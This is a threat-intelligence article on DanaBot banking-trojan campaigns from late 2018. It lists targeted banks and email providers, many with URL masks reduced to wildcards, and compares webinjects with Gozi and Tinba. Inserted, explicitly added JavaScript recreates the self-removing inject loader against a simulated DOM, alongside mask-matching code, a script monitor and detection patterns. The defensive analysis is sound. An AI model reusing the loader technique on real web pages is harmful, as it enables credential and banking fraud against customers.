December 17, 2018

DanaBot November Campaigns Target European Banks and Email Providers


First detected in May 2018, DanaBot is a banking trojan whose targeting has since shifted from banks in Australia to banks in Europe and, for the holiday phishing season, to global email providers such as Google, Microsoft and Yahoo. According to an F5 SOC research project for Websafe that analyzed active campaigns between November 7 and December 4, 2018, 88 percent of DanaBot's targets in that period were banking customers, primarily in Italy, followed by Poland and Germany.

Figure 1: DanaBot industry targets November 7 - December 4, 2018

DanaBot authors have been running four primary campaigns that target the following:

  1. The main campaign targeted multiple countries and industries, including banks, email providers, and a bitcoin exchange, primarily in Italy, followed by Poland, Germany, Austria, Switzerland, and the Netherlands.
  2. The second most active campaign targeted German banks.
  3. The third most active campaign targeted Polish banks.
  4. The fourth most active campaign targeted one Australian bank.

The main multi-industry, multi-country campaign was active throughout November. The three dedicated campaigns ran in parallel, but only on specific days rather than continuously. November 21, 2018 was the only day on which we saw all four campaigns active.

Figure 2: DanaBot campaign activity by day and targets

Looking at all targets by country across all campaigns, it is clear that the DanaBot authors are focused on Italian targets, followed by targets in Poland and Germany. The targets attributed to the US are mostly large email service providers that are used globally (plus one bank, Citi).

Figure 3: DanaBot Targets by Country

Multiple Campaign Targets

The following banks were targeted in this campaign, organized by country. Note that some banks have a presence in many countries; the attackers reveal their intended target when they specify a country-specific banking URL. Where only the wildcard of a target URL pattern survives in the source, the pattern is shown as *.

URL pattern                                   Country      Business
*                                             Austria      Bank Austria
*                                             Austria      Raiffeisen Bank
*                                             Austria      Raiffeisen Bank
https://*.at/banking/*                        Austria      Unknown
*                                             Austria      WSK Bank
*                                             Germany      BV-Active Banking
*                                             Germany      Commerz Bank
*                                             Germany      Deutsche Bank
*                                             Germany      Fidor Bank
https://banking.spard*de/spm/*                Germany      Sparda Bank
*                                             Italy        Banca Euro
*                                             Italy        Banco Posta
*                                             Italy        Banco Posta
*                                             Italy        Banking4You
*htm*                                         Italy        Banking4You
*                                             Italy        BNL Bank
*                                             Italy        BNL Bank
*=*                                           Italy        BNL Bank
*                                             Italy        BPER Bank
*/movimenti*                                  Italy        BPER Bank
*=*                                           Italy        BPER Bank
*id=internationalbeneficiary_WAR*             Italy        BPER Bank
*id=pagamenti_WAR_webcontocutilitiesportlet*  Italy        BPER Bank
*                                             Italy        BPM Bank
*                                             Italy        BPM Bank
*                                             Italy        CHE Bank
*                                             Italy        CHE Bank
*                                             Italy        Credem Bank
*                                             Italy        Credem Bank
*                                             Italy        Credem Bank
*                                             Italy        Credit Agricole Bank
*                                             Italy        Credit Agricole Bank
*/stile.cs*                                   Italy        CSE Bank
*.j*                                          Italy        CSE Bank
*                                             Italy        Deutsche Bank
*                                             Italy        Generali Bank
*htm*                                         Italy        Generali Bank
*                                             Italy        Gruppo Carige Bank
*                                             Italy        Gruppo Carige Bank
*                                             Italy        Gruppo Carige Bank
*                                             Italy        Hello Bank
*                                             Italy        Inbank
*                                             Italy        ING Bank
*                                             Italy        Intesa San Paolo Bank
*                                             Italy        Intesa San Paolo Bank
*                                             Italy        MPS Bank
*                                             Italy        Prossima Bank
*                                             Italy        Relax Bank
*                                             Italy        Scrigno Bank
*                                             Italy        UBI Bank
*                                             Italy        UBI Bank
*                                             Italy        UBI Bank
https://e-bank.*agricole.p*                   Poland       Agricole Bank
https://system.aliorbank.*                    Poland       Alior Bank
*                                             Poland       Bank BGZ BNP Paribas
*                                             Poland       BOS Bank
https://ebo.*.pl/*                            Poland       EBO Bank
*                                             Poland       GB24 Bank
*                                             Poland       IBiznes24 Bank
*                                             Poland       iPKO Bank
*                                             Poland       Nest Bank
*                                             Poland       Nest Bank
*                                             Poland       Plus 24 Bank
*                                             Poland       Raiffeisen Bank
https://sgbonline.sgb.p*                      Poland       SGB Bank
*                                             Poland       T-MOBILE Bankowe
*                                             Poland       Toyota Bank
*                                             Switzerland  Raiffeisen Bank
*                                             US           Citi Bank

The authors also targeted the following email services and platforms of major technology and entertainment providers across Europe and the US:

URL pattern               Country      Business
https://**                Germany      GMX
*                         Germany      GMX
*                         Italy        Vianova
**Main*                   Italy        Libero
*                         Italy        Tecnocasa
*.as*                     Italy        Quercia
https://**/main_swissco*  Switzerland  Bluewin
*                         Unknown      One
*                         US           Google
*                         US           Microsoft
*                         US           Yahoo

The following crypto-exchange out of the Netherlands was also targeted:

URL pattern   Country      Business
*             Netherlands  BitBay
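The target lists above are URL masks: the inject fires on any page whose address matches the mask, and `*` does the work. As an added illustration that is not part of the original article or of DanaBot's own configuration, the JavaScript below matches URLs against masks of this form. It assumes that `*` stands for any run of characters and that everything else in a mask is literal, as in classic banking-trojan inject configs; the masks are the ones that survive in the tables, while the test URLs and the country tally are constructed.

```javascript
// Added example (not from the article or from DanaBot): matching URLs
// against webinject target masks. Assumption: "*" matches any run of
// characters, everything else is literal. Regex metacharacters in the
// mask (".", "?", "+", ...) are escaped so a dot in a hostname stays a dot.
function maskToRegExp(mask) {
  const escaped = mask
    .replace(/[.+?^${}()|[\]\\]/g, "\\$&")
    .replace(/\*/g, ".*");
  return new RegExp("^" + escaped + "$", "i");
}

// Masks that survive in the article's tables, with their country/business.
const TARGETS = [
  { mask: "https://*.at/banking/*",          country: "Austria", business: "Unknown" },
  { mask: "https://banking.spard*de/spm/*",  country: "Germany", business: "Sparda Bank" },
  { mask: "https://e-bank.*agricole.p*",     country: "Poland",  business: "Agricole Bank" },
  { mask: "https://system.aliorbank.*",      country: "Poland",  business: "Alior Bank" },
  { mask: "https://ebo.*.pl/*",              country: "Poland",  business: "EBO Bank" },
  { mask: "https://sgbonline.sgb.p*",        country: "Poland",  business: "SGB Bank" },
];

// Every target whose mask matches the URL (a URL may hit several masks).
function matchTargets(url, targets = TARGETS) {
  return targets.filter((t) => maskToRegExp(t.mask).test(url));
}

// Per-country hit counts over a set of observed URLs, the same tally the
// article reports per campaign.
function countByCountry(urls, targets = TARGETS) {
  const counts = {};
  for (const url of urls) {
    for (const t of matchTargets(url, targets)) {
      counts[t.country] = (counts[t.country] || 0) + 1;
    }
  }
  return counts;
}

// Constructed URLs (not real banking hosts) to exercise the masks.
const SAMPLE_URLS = [
  "https://system.aliorbank.pl/login",
  "https://banking.sparda-test.de/spm/index",
  "https://www.example.at/banking/home",
  "https://ebo.example.pl/",
  "https://sgbonline.sgb.pl/",
  "https://www.example.com/",
];

function tallyDemo() {
  return countByCountry(SAMPLE_URLS);
}
```

Two things the masks themselves teach. A wildcard in the host part (`https://*.at/banking/*`, `https://ebo.*.pl/*`) matches every host with that suffix, which is why the Austrian entry can only be recorded as "Unknown". A mask with no path after the host (`https://sgbonline.sgb.p*`) fires on every page of the site, so anything page-specific has to live in the injected JavaScript rather than in the mask.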

Germany Campaign Targets

The following businesses were targeted in the Germany campaign:

URL pattern                Location   Business
https://**                 Germany    Berlin Bank
https://*banking.sparda-*  Germany    Sparda Bank
https://**                 Germany    Sparda Bank
https://*                  Germany    Sparda Bank
https://**                 Germany    Comdirect Bank
https://**                 Germany    Commerz Bank
https://**                 Germany    Comdirect Bank
https://**                 Germany    Deutsche Bank
https://**                 Germany    Noris Bank
https://**                 Germany    Targo Bank

Poland Campaign Targets

All of the identifiable targets in this campaign are banks.

URL pattern                 Location   Business
https://system.aliorbank.*  Poland     Alior Bank
*                           Poland     Nest Bank
*                           Poland     Nest Bank
*                           Poland     Plus Bank 24
*                           Poland     Raiffeisen Bank
*                           Poland     Santander Bank
*                           Poland     T-Mobile Bank

Australian Campaign Targets

The Australian campaign targeted one bank over two URLs:

URL pattern   Location   Business
https://**    Australia  Comm Bank
https://**    Australia  Comm Bank

Webinject Crafting Goes Professional Part 2

DanaBot uses the same webinject pattern that Tinba and Gozi used in the past, as we reported in May 2016. That DanaBot, Tinba and Gozi share this webinjection behavior strongly supports the claim in our previous article that a great deal of fraud business logic is now implemented in JavaScript and delivered in the webinjects themselves.

Note this example of a script used in both Tinba and Gozi in 2016. Both use the same element names and injection routine:

Figure 4: Tinba and Gozi injection routine, 2016

In the 2016 Gozi inject, the script element's id is myjs3 and the inject carries a placeholder, @ID@, which is probably replaced with the bot ID when the inject is built. DanaBot's inject uses the same id value, myjs3, but carries the actual bot ID rather than a placeholder.

Figure 5: Webinject used in Gozi, 2016

Now compare that with this recent DanaBot example. The 2016 Gozi inject loads an external JavaScript file named myjs8_amo.js into the victim's page; DanaBot's inject loads one named myjs28_frr_w1.js. To mask its activity on the injected page, the inject looks up its own script element with getElementById and detaches it with removeChild immediately after it has executed, so the element is no longer present in the live DOM by the time anyone inspects the page.

Figure 6: Webinject used in DanaBot, November 2018
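The self-removing loader described above is easy to hook from the page side, because both the insertion of the external script and the cleanup go through the DOM API. The following JavaScript is an added illustration, not code from DanaBot, Gozi or F5: it reproduces the pattern (an inline script element with id myjs3 that the trojan placed in the HTML response, which loads myjs28_frr_w1.js and then removes itself via getElementById and removeChild) and a monitor that wraps appendChild/removeChild to record every script insertion and removal. It runs offline in Node against a constructed, minimal DOM stand-in; the script host, bot ID and the benign control script are placeholders. In a browser you would call installScriptMonitor(Node.prototype, log) and work against the real document.

```javascript
// Added example (not DanaBot's, Gozi's or F5's code). FakeNode/FakeDocument
// are a constructed stand-in for the browser DOM so the example runs in Node.
class FakeNode {
  constructor(tagName) {
    this.tagName = tagName.toUpperCase();
    this.id = "";
    this.src = "";
    this.parentNode = null;
    this.childNodes = [];
  }
  appendChild(child) {
    if (child.parentNode) child.parentNode.removeChild(child);
    child.parentNode = this;
    this.childNodes.push(child);
    return child;
  }
  removeChild(child) {
    const i = this.childNodes.indexOf(child);
    if (i < 0) throw new Error("NotFoundError: node is not a child");
    this.childNodes.splice(i, 1);
    child.parentNode = null;
    return child;
  }
}

class FakeDocument {
  constructor() {
    this.head = new FakeNode("head");
    this.body = new FakeNode("body");
  }
  createElement(tag) { return new FakeNode(tag); }
  getElementById(id) {
    const walk = (n) => {
      if (n.id === id) return n;
      for (const c of n.childNodes) { const r = walk(c); if (r) return r; }
      return null;
    };
    return walk(this.head) || walk(this.body);
  }
}

// Monitor: wrap appendChild/removeChild on the node prototype so every
// <script> insertion or removal made through the DOM API is logged.
// Returns an uninstall function that restores the originals.
function installScriptMonitor(proto, log) {
  const origAppend = proto.appendChild;
  const origRemove = proto.removeChild;
  const record = (op, el) => {
    if (el && el.tagName === "SCRIPT") log.push({ op, id: el.id, src: el.src });
  };
  proto.appendChild = function (child) { record("append", child); return origAppend.call(this, child); };
  proto.removeChild = function (child) { record("remove", child); return origRemove.call(this, child); };
  return function uninstall() { proto.appendChild = origAppend; proto.removeChild = origRemove; };
}

// The inject as the article describes it: the inline <script id="myjs3">
// (already in the served HTML) loads the external loader and then deletes
// itself. The host is a placeholder; the file name is the one on the page.
function runInjectedLoader(doc, botId) {
  const loader = doc.createElement("script");
  loader.src = "https://example.invalid/" + botId + "/myjs28_frr_w1.js";
  doc.head.appendChild(loader);
  const self = doc.getElementById("myjs3");
  self.parentNode.removeChild(self);
}

// Naming scheme seen on the page: element id myjs<N>, file myjs<N>_<suffix>.js.
const INJECT_ID = /^myjs\d+$/;
const INJECT_FILE = /^myjs\d+(_[a-z0-9]+)+\.js$/i;

// Classify logged events. A removal with no logged append means the element
// reached the DOM another way (here: served inside the modified HTML), which
// is exactly the man-in-the-browser case, so it is reported, not dropped.
function findInjectIndicators(log) {
  const appended = new Set();
  const hits = [];
  for (const e of log) {
    const key = e.id || e.src;
    const file = (e.src || "").split("/").pop();
    const suspicious = INJECT_ID.test(e.id) || INJECT_FILE.test(file);
    if (e.op === "append") appended.add(key);
    if (suspicious) {
      hits.push({ op: e.op, id: e.id, src: e.src, appendSeen: e.op === "append" || appended.has(key) });
    }
  }
  return hits;
}

function runDemo() {
  const doc = new FakeDocument();
  // Parser-inserted inline inject: placed directly, bypassing appendChild,
  // the way the HTML parser would place a tag that was in the response.
  const inlineInject = new FakeNode("script");
  inlineInject.id = "myjs3";
  inlineInject.parentNode = doc.head;
  doc.head.childNodes.push(inlineInject);
  const log = [];
  const uninstall = installScriptMonitor(FakeNode.prototype, log);
  // Control: a legitimate script that is also appended and removed.
  const benign = doc.createElement("script");
  benign.src = "https://example.invalid/static/app.js";
  doc.head.appendChild(benign);
  doc.head.removeChild(benign);
  runInjectedLoader(doc, "0123456789abcdef"); // constructed bot ID
  uninstall();
  return { hits: findInjectIndicators(log), injectStillInDom: doc.getElementById("myjs3") !== null, events: log.length };
}
```

The monitor has to be installed before the injected script runs, which in practice means it ships in the first script of the page; anything that loads later only sees a clean DOM, which is the point of the self-removal. The name patterns are the weakest part of the check and will change with the next campaign, so the durable signal is the behavior itself: a script element removed moments after it was inserted, or removed without ever having been inserted through the DOM API.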


As with all banking trojans, DanaBot actively updates its campaign targets to both avoid detection and maintain continual operations to optimize the attacker’s financial reward. We are not surprised to see a geographically diverse range of targets during the peak holiday phishing and fraud season. However, what is notable is the focus on European banks, most specifically the Italian banks.

While we do not know who is maintaining this malware, the threat actors are using the same injection patterns as those used by older, successful banking trojans like Gozi and Tinba. Given this progression, we wouldn’t be surprised if this malware continued its increased activity in 2019.

All organizations, especially the known targets identified in this article, should make their customers aware that they are being targeted through phishing and spam campaigns. The main purpose of these campaigns is to plant malware on their machines that is designed to steal money from their bank accounts and gain access to their email.

To combat the impact of fraudulent transactions occurring as the result of malware-infected customer machines, organizations should implement fraud detections within their web platforms that can detect banking trojans and block resulting fraudulent transactions. For more details on how to combat phishing attacks that lead to fraud, see F5 Labs’ 2018 Phishing and Fraud Report.
